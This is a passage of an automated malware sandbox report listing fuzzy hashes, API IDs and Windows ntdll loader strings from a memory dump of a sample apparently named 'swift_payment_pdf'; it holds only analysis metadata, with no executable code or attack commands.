                  • Instruction ID: 9848a21c3b522db32eca47556c2a22aeb5fff55d84ba7da886181ca8c30c035c
                  • Opcode Fuzzy Hash: bb713bfa9844102b49779dac35348f74bbbb3cbbbbd0f81d7302d242244bc86e
                  • Instruction Fuzzy Hash: 6F61B0706003059FDB29CF28C481BAABBE9FF45708F14C55DE5898B79AD770E881CB91
                  Strings
                  • minkernel\ntdll\ldrinit.c, xrefs: 013C82E8
                  • LdrpInitializePerUserWindowsDirectory, xrefs: 013C82DE
                  • Failed to reallocate the system dirs string !, xrefs: 013C82D7
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-1783798831
                  • Opcode ID: ebe38e75fa95b689810eeb188a5bc30692dd6f75a0bad589fdcccdacd146db06
                  • Instruction ID: 989d2b0389effe88aaf2ee1928e81658f34283d10105b686a73f9e79872c92ce
                  • Opcode Fuzzy Hash: ebe38e75fa95b689810eeb188a5bc30692dd6f75a0bad589fdcccdacd146db06
                  • Instruction Fuzzy Hash: DD41DFB6540315AFDB31FB68D844B9B7BE8FF48A58F01492AF948D7264E770D800CBA1
                  Strings
                  • @, xrefs: 0140C1F1
                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0140C1C5
                  • PreferredUILanguages, xrefs: 0140C212
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                  • API String ID: 0-2968386058
                  • Opcode ID: bbf53cd9f3656900d584c89b0ad1d39d881e86330599806b7318b99d6d1d9c86
                  • Instruction ID: 96f783df0039460606f814382dcd54d89890e1f37b1f65d8a695d72edba7c0a8
                  • Opcode Fuzzy Hash: bbf53cd9f3656900d584c89b0ad1d39d881e86330599806b7318b99d6d1d9c86
                  • Instruction Fuzzy Hash: 1F416171E00209EBDF12DBD9C881BEEBBB8AB14714F1441BBE609A7690D7749A458B50
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                  • API String ID: 0-1373925480
                  • Opcode ID: b76715ec42c35850ce23d33d18acd011593ee93d6f9d4f2fa43fde886c3745d6
                  • Instruction ID: 701dce7895322c0984139021f897ce6520701983afa1c7530d58ebfae3957414
                  • Opcode Fuzzy Hash: b76715ec42c35850ce23d33d18acd011593ee93d6f9d4f2fa43fde886c3745d6
                  • Instruction Fuzzy Hash: 6141E172A04769CBEB25DB98C848BADBBF8FF59348F14045ADA01EB7D1D6349901CB10
                  Strings
                  • LdrpCheckRedirection, xrefs: 013D488F
                  • minkernel\ntdll\ldrredirect.c, xrefs: 013D4899
                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 013D4888
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                  • API String ID: 0-3154609507
                  • Opcode ID: cc8b71a0c4cddb300db310a7265973f286ca2cb283408bdedc2ac5528527c3fe
                  • Instruction ID: 97d5ab211be6814747f549e57572126f71f2aab73a75f42805c0b5d3048fd45c
                  • Opcode Fuzzy Hash: cc8b71a0c4cddb300db310a7265973f286ca2cb283408bdedc2ac5528527c3fe
                  • Instruction Fuzzy Hash: 8C41B037A042519BCB21CF6CF841A26BFE9BF49A98F060569ED98E7B11D731D800CB91
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                  • API String ID: 0-2558761708
                  • Opcode ID: f74b2dd9c00418598c4b379c9d46844ef2432fbe98e0305bc29917413e001037
                  • Instruction ID: b3ca139757fc109a40d09d7d46799f4a542110cdb677d86e07b09fa291b7460f
                  • Opcode Fuzzy Hash: f74b2dd9c00418598c4b379c9d46844ef2432fbe98e0305bc29917413e001037
                  • Instruction Fuzzy Hash: E011E131315106DFDB2DDB28C482BB6B3A8EF4061EF18C129F506DBA99EB38E840C750
                  Strings
                  • Process initialization failed with status 0x%08lx, xrefs: 013D20F3
                  • minkernel\ntdll\ldrinit.c, xrefs: 013D2104
                  • LdrpInitializationFailure, xrefs: 013D20FA
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-2986994758
                  • Opcode ID: b83400f5fdbdb4fbc455fd6c9ee8bded240389ad3034088a1fd0fab2f7cea25f
                  • Instruction ID: 429c891cd8a5780d0ea83333166f392c2ee5d7721ce2ac5993c2b8305f6c8dff
                  • Opcode Fuzzy Hash: b83400f5fdbdb4fbc455fd6c9ee8bded240389ad3034088a1fd0fab2f7cea25f
                  • Instruction Fuzzy Hash: C2F0C879640318AFE724EB5DDC42F963B68EB40F5CF104059FA407B281D5B0A904C695
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: #%u
                  • API String ID: 48624451-232158463
                  • Opcode ID: 91e8a71516400e247dfcfbcda5c47d1dbcd932331482626b8ba7b6c3ac3b3da5
                  • Instruction ID: bd6f70c7780f555dd50b843694e475076ddfdb4592658b382d05b292d4c9621e
                  • Opcode Fuzzy Hash: 91e8a71516400e247dfcfbcda5c47d1dbcd932331482626b8ba7b6c3ac3b3da5
                  • Instruction Fuzzy Hash: 93716A71A0010A9FDF05DFA8C990BAEB7F8FF18708F144065EA05A7256EA34ED01CB64
                  Strings
                  • LdrResSearchResource Enter, xrefs: 0135AA13
                  • LdrResSearchResource Exit, xrefs: 0135AA25
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                  • API String ID: 0-4066393604
                  • Opcode ID: b9ea99fb532cab31668660a4313b222e8c29a7a2f57df3169cda23b0cde28d42
                  • Instruction ID: 59be039f12651de54c0c843b9ba1b72bd492ec710cef834e334eefcff565eb10
                  • Opcode Fuzzy Hash: b9ea99fb532cab31668660a4313b222e8c29a7a2f57df3169cda23b0cde28d42
                  • Instruction Fuzzy Hash: 14E17171E00219ABEF62CE9DC980FEEBBB9BF44718F144626EE01E7651E7349940DB50
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: `$`
                  • API String ID: 0-197956300
                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                  • Instruction ID: 23fff3db130d2d4f91d33ab8c3e291e06f2c5a15538e69929bfd501a1bc3c616
                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                  • Instruction Fuzzy Hash: CFC1F5312053829BE725CF29C840B6BBBE5BFD4318F284A2EF699C72A8D774D505CB41
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: Legacy$UEFI
                  • API String ID: 2994545307-634100481
                  • Opcode ID: db8f13b568ad7bf7613db6d407ee4cd577d730d675fe2688e3fefb2238b3d67a
                  • Instruction ID: 9bcc6ddb90b4463ffcd7eceb7f5e2194632f8c7794aabb24bce8c6c463a599e3
                  • Opcode Fuzzy Hash: db8f13b568ad7bf7613db6d407ee4cd577d730d675fe2688e3fefb2238b3d67a
                  • Instruction Fuzzy Hash: C2611972E007199FDB15DFA88940AAEBFB9FB48B08F14407DE659EB251D731AD40CB50
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$MUI
                  • API String ID: 0-17815947
                  • Opcode ID: 582e0810a0dc90d065a1a336828aa443256798aaefd853f2a72f31c608a5d1b3
                  • Instruction ID: af05141d47bbb131dbe25929241fc2768d5a50e45543954d7a7837d6f7a2b3b2
                  • Opcode Fuzzy Hash: 582e0810a0dc90d065a1a336828aa443256798aaefd853f2a72f31c608a5d1b3
                  • Instruction Fuzzy Hash: A751F771E0161DAEDF11DFA9CC84EEFBBBDEB44758F100529EA15B7290D6309A05CBA0
                  Strings
                  • kLsE, xrefs: 01350540
                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0135063D
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                  • API String ID: 0-2547482624
                  • Opcode ID: 70153d57de478dba8726e3b1318b591d192850011dd400c40ea4d6143e1f4fe9
                  • Instruction ID: c894a102c96acc725987bbcdd9962d6a2d42dd35cb673c2b2c67d26d68a7836e
                  • Opcode Fuzzy Hash: 70153d57de478dba8726e3b1318b591d192850011dd400c40ea4d6143e1f4fe9
                  • Instruction Fuzzy Hash: 6951B0715047428FD768DF68C580AA7BBE4EF84B18F10483EFAEA87241E772D545CBA1
                  Strings
                  • RtlpResUltimateFallbackInfo Enter, xrefs: 0135A2FB
                  • RtlpResUltimateFallbackInfo Exit, xrefs: 0135A309
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                  • API String ID: 0-2876891731
                  • Opcode ID: 45dbf201d60f0a1ecbd206ee1495ec73920fadfde8ebf4e5866e5dda63d264ea
                  • Instruction ID: 8b209eab2b491fb316fae7135a9b271300656ae62719c3490b76803c526a8ff1
                  • Opcode Fuzzy Hash: 45dbf201d60f0a1ecbd206ee1495ec73920fadfde8ebf4e5866e5dda63d264ea
                  • Instruction Fuzzy Hash: A141BC31A04649DBDB15DF59C880FAA7BB8FF84B0CF1442A5EE04DB692E6B5D900CB50
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: Cleanup Group$Threadpool!
                  • API String ID: 2994545307-4008356553
                  • Opcode ID: 22eae8dde3b6c8de6ea540170c5dbbfb3243b4f5fa77b047279eb066ecc3bb4c
                  • Instruction ID: 3698edbd5994ae251d7d2f6a70869bd340137887eab39dfb9afb54b33c23e6f4
                  • Opcode Fuzzy Hash: 22eae8dde3b6c8de6ea540170c5dbbfb3243b4f5fa77b047279eb066ecc3bb4c
                  • Instruction Fuzzy Hash: 6F01D1B2251704AFD311EF14CD46B2677E8E78572DF01893AE658C7194E334D904CB4A
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: MUI
                  • API String ID: 0-1339004836
                  • Opcode ID: 8de56e7bcecc78cde520053ce5f3aef783eabd8ada9888d0d60d78aa9265096d
                  • Instruction ID: 9910eb8496ce67e4d5afcc7d2bcc44e774d5fde7a078135378e46f3c33474a05
                  • Opcode Fuzzy Hash: 8de56e7bcecc78cde520053ce5f3aef783eabd8ada9888d0d60d78aa9265096d
                  • Instruction Fuzzy Hash: 74825C75E003198BEB65CFA9C880BEDBBB9BF48B18F148169DD19AB351D7309D81CB50
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID: 0-3916222277
                  • Opcode ID: 757e33443a2a3f561a88aff021a3fed90cefa96d170d698bc7d99a5c96b45b03
                  • Instruction ID: d2742f80ebf4a8dc9407ae4333dcda9c6c93bfa31c0dda0ce2bcf22be8833c22
                  • Opcode Fuzzy Hash: 757e33443a2a3f561a88aff021a3fed90cefa96d170d698bc7d99a5c96b45b03
                  • Instruction Fuzzy Hash: 4C9195B2A00219AFEB21DF99DC85FAEBBB9EF14754F104065F610BB194D774AD04CBA0
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID: 0-3916222277
                  • Opcode ID: 21049c8bc84d205ccdb77ca27ca0edd6fa2bb42046e47c6cd250f0fd439f6089
                  • Instruction ID: 46e09681b543d04da333af35c066c03ed7e9601bb85ec1b0a58d06a8e34e74f3
                  • Opcode Fuzzy Hash: 21049c8bc84d205ccdb77ca27ca0edd6fa2bb42046e47c6cd250f0fd439f6089
                  • Instruction Fuzzy Hash: C191A136900609BFDF22ABA9DD44FAFBBBDEF45748F11002AF605A7260E7749901CB51
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: GlobalTags
                  • API String ID: 0-1106856819
                  • Opcode ID: 8a4b00ca6a02b7cf25751edca7fa6d34e658180a5ec58a5edd4e1218637cbe1c
                  • Instruction ID: 45923e1f9480614c53f4aec6ad8cd1d05953a6b7a58863861812393dd9374581
                  • Opcode Fuzzy Hash: 8a4b00ca6a02b7cf25751edca7fa6d34e658180a5ec58a5edd4e1218637cbe1c
                  • Instruction Fuzzy Hash: 8E715BB5E0030A9BDF28DF9CC5916AEBBB1BF88B18F14852EE905A7345E7359C41CB50
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: .mui
                  • API String ID: 0-1199573805
                  • Opcode ID: 3a731da6a57307980f76fd3e0b6ddd287f6b55cc9447a618b0510d96e20ca21d
                  • Instruction ID: 31b504b8a7c77f01c17cea95eb64fc11cfee4738f714108e6814d21f6a88bb29
                  • Opcode Fuzzy Hash: 3a731da6a57307980f76fd3e0b6ddd287f6b55cc9447a618b0510d96e20ca21d
                  • Instruction Fuzzy Hash: CC519172D0022A9BDF10DF9DD840AAFBBB8AF44A58F05412DEA15BB350D7349D05CFA4
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: EXT-
                  • API String ID: 0-1948896318
                  • Opcode ID: 227a3240f9877ef75cdd9f4ba487963dccb190e0d35474e90e7f8cc20bcf2a9e
                  • Instruction ID: 17aa967d950ca0f4e37c2f596a11f9e8f41c6449dd140d608e16cd9c75adf95e
                  • Opcode Fuzzy Hash: 227a3240f9877ef75cdd9f4ba487963dccb190e0d35474e90e7f8cc20bcf2a9e
                  • Instruction Fuzzy Hash: BC41A3765183129BD720DA79C844B6BBBECAF8871CF04893DF684D7184E678DA08C796
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: BinaryHash
                  • API String ID: 0-2202222882
                  • Opcode ID: c63062b123641a39902a7efeaa8b42363fe26d9c2e4f67d4838f1d36c76a36f4
                  • Instruction ID: b6a240fb65bf1064da2aa0d3896b2c82e70c4c01b53dea0f1d1c567cffc5b717
                  • Opcode Fuzzy Hash: c63062b123641a39902a7efeaa8b42363fe26d9c2e4f67d4838f1d36c76a36f4
                  • Instruction Fuzzy Hash: AB4124B1D0162DAADF21DA54CC84FDFB77CAB45718F0045A9AA0CAB140DB709E498FA4
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: #
                  • API String ID: 0-1885708031
                  • Opcode ID: 890b592b61545b3bc05bc6cdb758ce5e9ced5b5e8a610869f699f96f4cff7f18
                  • Instruction ID: 1867c7338c10ae17763f9a4f4b26dabc2c8be5191978781de274b2a6af6ab6fa
                  • Opcode Fuzzy Hash: 890b592b61545b3bc05bc6cdb758ce5e9ced5b5e8a610869f699f96f4cff7f18
                  • Instruction Fuzzy Hash: E2314A71A007299BEF22CB6DC859BEE7BE8DF6530CF104068E941AB2C2D775E815CB50
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: BinaryName
                  • API String ID: 0-215506332
                  • Opcode ID: 1940701c672b588136dbd05b35c0511b03bf872c2d83e164f643b24355e45759
                  • Instruction ID: cb9abcad9b83d633aa4fe8b757242e02f480096803f0be0697885b0d339da2f4
                  • Opcode Fuzzy Hash: 1940701c672b588136dbd05b35c0511b03bf872c2d83e164f643b24355e45759
                  • Instruction Fuzzy Hash: 35312736900519AFEB15DB9CC845E6FBB78EF80B18F01416DE909A7250D730AE04E7E0
                  Strings
                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 013D895E
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                  • API String ID: 0-702105204
                  • Opcode ID: 68d8d9ed6474000e132ddea1956145d20035b27ef588b90d24eb96f1b5d5ad49
                  • Instruction ID: 35e52dcbc068908490bbe3f09d2d076b611e598fa2b6174c1401e5c82bf330aa
                  • Opcode Fuzzy Hash: 68d8d9ed6474000e132ddea1956145d20035b27ef588b90d24eb96f1b5d5ad49
                  • Instruction Fuzzy Hash: A401F737200201ABEB206F59F884E5A7B65FF8565CB04046DF68116562CB30B841CB92
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b57c8bfd74560312363bce54d8815db3b172b3f66938efa4e13106154882a97b
                  • Instruction ID: 167608ac8cc13abbe687d0fb63d511ec492317eb8a18429a84107ef05f91803d
                  • Opcode Fuzzy Hash: b57c8bfd74560312363bce54d8815db3b172b3f66938efa4e13106154882a97b
                  • Instruction Fuzzy Hash: DA42D276608341DFEB25CF68C890A6BBBE5BF88308F48492DFB8697250D771D845CB52
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1477268e7c8bb34ca4b43d17f1dee713b2003299596d64e864a46749a44f4ff9
                  • Instruction ID: f96f581ec3fdc0678978ecbcbb9f436f1713e0eb0c985344808ce5988c7e8208
                  • Opcode Fuzzy Hash: 1477268e7c8bb34ca4b43d17f1dee713b2003299596d64e864a46749a44f4ff9
                  • Instruction Fuzzy Hash: CB424975E003298FEB25CF69C885BADBBF5BF48314F1480D9E949AB282D7349985CF50
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e5cb11c892856ea6cfdb5fc26f76df8d7468a96bcd43dcf8c11141d130f02ba4
                  • Instruction ID: d5dd5b80df4e7e479111b9e9a468156bcae3a65fb04a9c44110cec4091a04465
                  • Opcode Fuzzy Hash: e5cb11c892856ea6cfdb5fc26f76df8d7468a96bcd43dcf8c11141d130f02ba4
                  • Instruction Fuzzy Hash: B732E2B0A007598FDB25CF69C8857FEBBF6BF84308F14811DD6469BA86E735A811CB50
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e7283663678d7241f73ec5e4501c06befee6558b53d8602429f39e587d170653
                  • Instruction ID: fc6ab360043b07fe8bcfba83c6526d1a44babf541cc38d0730d6ca2917e62c38
                  • Opcode Fuzzy Hash: e7283663678d7241f73ec5e4501c06befee6558b53d8602429f39e587d170653
                  • Instruction Fuzzy Hash: F522CD742046658BEB25CF2DC094772BBF1AF44348F08849EEB8E8F686D735E456DB60
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 65ac232f99eca4b4e44dcd792c7ec8287196c6d915757f0401ea9fbfc333d736
                  • Instruction ID: d06b1a0fd0afde0dcb3786e97bc6a953dda065d3b5bb5e5b5359ad04c373c231
                  • Opcode Fuzzy Hash: 65ac232f99eca4b4e44dcd792c7ec8287196c6d915757f0401ea9fbfc333d736
                  • Instruction Fuzzy Hash: E732F1B0A01209CFDB65CF69C490BAEBBF5FF48308F548569EA4AAB751D734E841CB50
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                  • Instruction ID: a611f3fd947bc2a5d8ebc0504cf9fc7910c56f48f7e8cb033a07dd7a89f0f3ec
                  • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                  • Instruction Fuzzy Hash: 57F17170E0020ADBDF25CF99C580BEEBBF5AF48718F048129EA45AB655E778EC41CB50
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 96d0b67f913593028124276b1ea2ee66922d8eb08c7cff62f130d5d386d8cc29
                  • Instruction ID: 92d54bf746f3f554f1e4144da6e228c846e92e73f10a6a4bddb95b66de99bffd
                  • Opcode Fuzzy Hash: 96d0b67f913593028124276b1ea2ee66922d8eb08c7cff62f130d5d386d8cc29
                  • Instruction Fuzzy Hash: BCD1E171E0072A8BEF15CF6CC845AFEB7F5AF88308F1881A9D955A7281D735E9058B60
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1911c0025cae46f1f391afac7f06619827fd9dbcdaac3bf7e2c090d1a4c83654
                  • Instruction ID: d29c7e1c14f7827850619ddb80bb2b972f08b6619e38f6a9af55d1ed3d05b366
                  • Opcode Fuzzy Hash: 1911c0025cae46f1f391afac7f06619827fd9dbcdaac3bf7e2c090d1a4c83654
                  • Instruction Fuzzy Hash: 3BE19EB1608342CFC755CF28C090A6ABBF4FF89718F45896DE99987351EB31E905CB92
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3574bcd9e6e3842c7468327c047f18b297f6a3fc9a2e793a30301c3b38281094
                  • Instruction ID: 65d5f3e6e5aac9e26239dc46179aeb34eef34f50461717c1bc86c3d2b00791ba
                  • Opcode Fuzzy Hash: 3574bcd9e6e3842c7468327c047f18b297f6a3fc9a2e793a30301c3b38281094
                  • Instruction Fuzzy Hash: 73D11671A0020ACBDB14DFA8C890ABABBF5FF5431CF04866DE915DB291E734E951CB50
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                  • Instruction ID: cd473ac673a3e3fb978e691a8e6c12154f30c400e9f1f171f7b2fedea75a04e2
